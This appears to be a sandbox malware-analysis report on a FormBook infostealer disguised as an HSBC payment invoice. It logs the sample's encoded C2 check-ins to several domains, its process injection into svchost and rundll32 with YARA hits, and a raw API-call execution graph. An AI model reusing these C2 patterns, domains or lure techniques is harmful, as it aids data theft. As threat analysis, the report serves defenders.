                  Jul 3, 2024 10:53:39.277683973 CEST | 420 | OUT | GET /73ru/?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.oliviacorepilates.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:39.740819931 CEST | 397 | IN | HTTP/1.1 200 OK
                  Server: openresty
                  Date: Wed, 03 Jul 2024 08:53:39 GMT
                  Content-Type: text/html
                  Content-Length: 257
                  Connection: close
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxU"}</script></head></html>


                  Session ID: 33 | Source IP: 192.168.2.11 | Source Port: 49752 | Destination IP: 104.21.21.230 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:44.773061037 CEST | 699 | OUT | POST /6xrq/ HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.personalcaresale.shop
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.personalcaresale.shop/6xrq/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=5bjJcV2NzgT1teI0J3NAvaHzxi6qZxQmcnnz5SxJLTsHlRFeDF99VCQTl46Vhfit/KmZ8E+MWJPsxWF9hVowyJeV7Cho0xsUgH+kCOdPebv+y0ZzVovZPFVlgckhvX5OLbt9qCa8Ev1RlWgKaOjoIYbvhEAaq1C/jg1Qm3Jrsw+SRAqN0KVVUMXrSnq+zbnEmg==
                  Jul 3, 2024 10:53:45.389847994 CEST | 700 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2F3VUpqZ02hxAOrdy5rAfygw52MPm9RKb2e6ChyOTy8THX61WcOizyyoVHDmOmHVsL7090hm83orzOA6wqFuoU1rJGNNK2nJtr0jOsbUqjYf%2FEIt0zyvWMMBBMLaV%2FmboV9sF2mm52ldDM1G"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a59d5f5a72b3-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400


                  Session ID: 34 | Source IP: 192.168.2.11 | Source Port: 49753 | Destination IP: 104.21.21.230 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:47.306629896 CEST | 719 | OUT | POST /6xrq/ HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.personalcaresale.shop
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.personalcaresale.shop/6xrq/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=5bjJcV2NzgT1v9A0ak1Ao6H0+C6qQRQ6cnrz5T0ULh4Hl1BeCE99SCQTqY6Qs/i2/Kbm8EyMWKzsxTB9hEozzZeX9ChqwxsUgH+kCOJxeaH+yglzHZvWMFVmq8kh4n4mLbtfqDXZEtNRlUoKbbDrRobtlEB4jnLmjh44mhNclR+tdm7XkpcCXffpGBLO6qCN9lnIfBCGO+fweU7ZrWv9PXc=
                  Jul 3, 2024 10:53:48.018042088 CEST | 706 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rja9d8I04aHyYYI%2FqkuA7cgALUyPoYfNmWCImh3yaBuU8Y46Jd8RZ3XlgT80qIQN%2Fkazy4QeqgFHvQjKQr5gTjxvHBjriPkDMSsfjUklIjGIAcDYy6CRB1Fbw%2B%2B7ujvMVDXrna5Jt6o4jNZe"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a5adcdbf42bb-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400


                  Session ID: 35 | Source IP: 192.168.2.11 | Source Port: 49754 | Destination IP: 104.21.21.230 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:49.838572979 CEST | 1732 | OUT | POST /6xrq/ HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.personalcaresale.shop
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.personalcaresale.shop/6xrq/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:50.463789940 CEST | 708 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L1Y%2FznWSJWw9k9Cb7166enshXr7IU5eRh0bEVR2zsJimcF0rzg8kMSSrvAl%2BaQbiDanA6%2F%2BDf9v6wIbQF9VSzicuNsfbnG1%2BCGkdMKhDUQazHRQL1dNdALEvP%2BtAJyOccGyX104oGut4KN%2Fs"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a5bcfe6bc358-EWR
                  Content-Encoding: gzip
                  alt-svc: h3=":443"; ma=86400


                  Session ID: 36 | Source IP: 192.168.2.11 | Source Port: 49755 | Destination IP: 104.21.21.230 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:52.365255117 CEST | 420 | OUT | GET /6xrq/?Qb94=7vWTifjxU&ylT8el=0ZLpfg2H9HntusEXGWgUouKi/jDeWipEcG796wEdKEsBvDcnIDw0UWV/lYuuqMa5oYme4k6lXZ3r5FhP4GItrsCavENJ4moU1CqQcclLTaPymUsAULXTIFQ= HTTP/1.1
                  Host: www.personalcaresale.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Jul 3, 2024 10:53:53.031018019 CEST | 651 | IN | HTTP/1.1 404 Not Found
                  Date: Wed, 03 Jul 2024 08:53:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  X-Powered-By: PHP/7.4.33
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7%2FAPg60HedazsEu0tfq0EBkBUklhLNHZEJ780Pp9KCObyaD0j61WR%2FDFLW8YUU2Fgk1%2B6EJbsFsvurC6JbEFrGa155G3IPuHGA3s%2BZhWjqRknQV6Wj%2BfSnuc%2FR8MU0nADJ44KWeABjK92Yh"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 89d5a5cce971c339-EWR
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Session ID: 37 | Source IP: 192.168.2.11 | Source Port: 49756 | Destination IP: 74.208.46.171 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:53:58.072606087 CEST | 693 | OUT | POST /6qht/ HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lavillitadepapa.com
                  Content-Length: 203
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lavillitadepapa.com/6qht/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=jtWrERVon2eSyNkad8rGNMKIpg3A+nR3wrHMce9DugE3aHkITrxl8xM054h5Aih+XECciVjtsobvgke60fgBb7634ZRodkJB6mI7QZ4TR0nCJGiNsqxTqfbG5ymrD1OvNC2zve9bxth/ynYwG9Qh91nVzzwL/KBq5RpsNOwziLHcrgq5LexJTlvaIswtlWKaPg==
                  Jul 3, 2024 10:53:58.601106882 CEST | 466 | IN | HTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:53:58 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/
                  Content-Length: 245
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/">here</a>.</p></body></html>


                  Session ID: 38 | Source IP: 192.168.2.11 | Source Port: 49757 | Destination IP: 74.208.46.171 | Destination Port: 80 | PID: 1164 | Process: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 3, 2024 10:54:00.600840092 CEST | 713 | OUT | POST /6qht/ HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lavillitadepapa.com
                  Content-Length: 223
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lavillitadepapa.com/6qht/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el=jtWrERVon2eSztUacfTGdcL6mA3Ar3RrwrDMcbdTtSg3amUIQqxlwRM0hoh8dygTXEGuiXntsoPvglu60OgAUL61z5RuDUJB6mI7QZstR0/CK3SNtLxMj/bFzSmrJlOrNC3WveNxxrt/ymowIMQgklnT8Txe7JgGzWY4UtUd0Z3cqm7jb94eQ2nYcKRdsnvTUsqb/KAvFWTTIDfNTLXWnOU=
                  Jul 3, 2024 10:54:01.120146990 CEST | 466 | IN | HTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:54:01 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/
                  Content-Length: 245
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/">here</a>.</p></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  39192.168.2.114975874.208.46.171801164C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp:Jul 3, 2024 10:54:03.133364916 CEST
                  Bytes transferred:1726
                  Direction:OUT
                  POST /6qht/ HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Encoding: gzip, deflate
                  Accept-Language: en-US,en;q=0.9
                  Origin: http://www.lavillitadepapa.com
                  Content-Length: 1235
                  Cache-Control: no-cache
                  Connection: close
                  Content-Type: application/x-www-form-urlencoded
                  Referer: http://www.lavillitadepapa.com/6qht/
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Data Ascii: ylT8el= [TRUNCATED]
                  Timestamp:Jul 3, 2024 10:54:03.750207901 CEST
                  Bytes transferred:466
                  Direction:IN
                  HTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:54:03 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/
                  Content-Length: 245
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/">here</a>.</p></body></html>


                  Session ID:40
                  Source IP:192.168.2.11
                  Source Port:49759
                  Destination IP:74.208.46.171
                  Destination Port:80
                  PID:1164
                  Process:C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp:Jul 3, 2024 10:54:05.666165113 CEST
                  Bytes transferred:418
                  Direction:OUT
                  GET /6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxU HTTP/1.1
                  Host: www.lavillitadepapa.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Timestamp:Jul 3, 2024 10:54:06.286864996 CEST
                  Bytes transferred:756
                  Direction:IN
                  HTTP/1.1 301 Moved Permanently
                  Date: Wed, 03 Jul 2024 08:54:06 GMT
                  Server: Apache
                  Location: https://www.lavillitadepapa.com/6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxU
                  Content-Length: 392
                  Connection: close
                  Content-Type: text/html; charset=iso-8859-1
                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.lavillitadepapa.com/6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&amp;Qb94=7vWTifjxU">here</a>.</p></body></html>


                  Session ID:41
                  Source IP:192.168.2.11
                  Source Port:49760
                  Destination IP:118.99.50.88
                  Destination Port:80
                  PID:1164
                  Process:C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Timestamp:Jul 3, 2024 10:54:14.433928967 CEST
                  Bytes transferred:409
                  Direction:OUT
                  GET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1
                  Host: www.zt555.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.9
                  Connection: close
                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                  Timestamp:Jul 3, 2024 10:54:15.362982035 CEST
                  Bytes transferred:289
                  Direction:IN
                  HTTP/1.1 404 Not Found
                  Server: nginx
                  Date: Wed, 03 Jul 2024 08:54:15 GMT
                  Content-Type: text/html
                  Content-Length: 146
                  Connection: close
                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>



                  Target ID:0
                  Start time:04:50:09
                  Start date:03/07/2024
                  Path:C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
                  Imagebase:0xe80000
                  File size:719'872 bytes
                  MD5 hash:15125BD7F04E0129CEEBB7781F7051D2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:04:50:10
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe"
                  Imagebase:0x730000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1521221555.0000000003B10000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1520805638.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1521716208.0000000004400000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:true

                  Target ID:10
                  Start time:04:50:29
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe"
                  Imagebase:0x510000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3725564617.0000000003010000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:11
                  Start time:04:50:30
                  Start date:03/07/2024
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\rundll32.exe"
                  Imagebase:0x640000
                  File size:61'440 bytes
                  MD5 hash:889B99C52A60DD49227C5E485A016679
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3713233444.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3725622704.0000000004660000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3725563654.0000000004620000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:14
                  Start time:04:50:43
                  Start date:03/07/2024
                  Path:C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe"
                  Imagebase:0x510000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.3730033950.00000000059A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:15
                  Start time:04:50:55
                  Start date:03/07/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6de060000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:4.1%
                    Dynamic/Decrypted Code Coverage:1.5%
                    Signature Coverage:5%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:56
API calls 98652->98654 98653->98650 98675 ee3436 ReadFile SetFilePointerEx 98653->98675 98676 e87a84 59 API calls 2 library calls 98653->98676 98655 ee35ba 98654->98655 98657 e85632 61 API calls 98655->98657 98658 ee35c8 98657->98658 98660 ee35d8 Mailbox 98658->98660 98677 e8793a 61 API calls Mailbox 98658->98677 98660->98384 98662 e89ba8 98661->98662 98663 e89be7 98661->98663 98665 ea0ff6 Mailbox 59 API calls 98662->98665 98664 e881a7 59 API calls 98663->98664 98666 e89bbb 98664->98666 98665->98666 98666->98389 98667->98360 98668->98390 98669->98361 98670->98361 98671->98367 98672->98374 98673->98383 98674->98388 98675->98653 98676->98653 98677->98660 98679 e89997 84 API calls 98678->98679 98680 efce2e 98679->98680 98703 efce75 Mailbox 98680->98703 98716 efdab9 98680->98716 98682 efd0cd 98683 efd242 98682->98683 98688 efd0db 98682->98688 98766 efdbdc 92 API calls Mailbox 98683->98766 98686 efd251 98686->98688 98689 efd25d 98686->98689 98687 e89997 84 API calls 98706 efcec6 Mailbox 98687->98706 98729 efcc82 98688->98729 98689->98703 98694 efd114 98744 ea0e48 98694->98744 98697 efd12e 98750 eea0b5 89 API calls 4 library calls 98697->98750 98698 efd147 98751 e8942e 98698->98751 98701 efd139 GetCurrentProcess TerminateProcess 98701->98698 98703->98396 98706->98682 98706->98687 98706->98703 98748 eef835 59 API calls 2 library calls 98706->98748 98749 efd2f3 61 API calls 2 library calls 98706->98749 98707 efd2b8 98707->98703 98712 efd2cc FreeLibrary 98707->98712 98709 efd17f 98763 efd95d 107 API calls _free 98709->98763 98712->98703 98715 efd190 98715->98707 98764 e88ea0 59 API calls Mailbox 98715->98764 98765 e89e9c 60 API calls Mailbox 98715->98765 98767 efd95d 107 API calls _free 98715->98767 98717 e87faf 59 API calls 98716->98717 98718 efdad4 CharLowerBuffW 98717->98718 98768 edf658 98718->98768 98722 e877c7 59 API calls 98723 efdb0d 98722->98723 98724 e879ab 59 API calls 98723->98724 98725 efdb24 98724->98725 98726 e87e8c 59 API calls 98725->98726 98727 efdb30 
Mailbox 98726->98727 98728 efdb6c Mailbox 98727->98728 98775 efd2f3 61 API calls 2 library calls 98727->98775 98728->98706 98730 efcc9d 98729->98730 98734 efccf2 98729->98734 98731 ea0ff6 Mailbox 59 API calls 98730->98731 98733 efccbf 98731->98733 98732 ea0ff6 Mailbox 59 API calls 98732->98733 98733->98732 98733->98734 98735 efdd64 98734->98735 98736 efdf8d Mailbox 98735->98736 98743 efdd87 _strcat _wcscpy __NMSG_WRITE 98735->98743 98736->98694 98737 e89d46 59 API calls 98737->98743 98738 e89c9c 59 API calls 98738->98743 98739 e89cf8 59 API calls 98739->98743 98740 e89997 84 API calls 98740->98743 98741 ea594c 58 API calls std::exception::_Copy_str 98741->98743 98743->98736 98743->98737 98743->98738 98743->98739 98743->98740 98743->98741 98778 ee5b29 61 API calls 2 library calls 98743->98778 98745 ea0e5d 98744->98745 98746 ea0ef5 VirtualAlloc 98745->98746 98747 ea0ec3 98745->98747 98746->98747 98747->98697 98747->98698 98748->98706 98749->98706 98750->98701 98752 e89436 98751->98752 98753 ea0ff6 Mailbox 59 API calls 98752->98753 98754 e89444 98753->98754 98755 e89450 98754->98755 98779 e8935c 59 API calls Mailbox 98754->98779 98757 e891b0 98755->98757 98780 e892c0 98757->98780 98759 e891bf 98760 ea0ff6 Mailbox 59 API calls 98759->98760 98761 e8925b 98759->98761 98760->98761 98761->98715 98762 e88ea0 59 API calls Mailbox 98761->98762 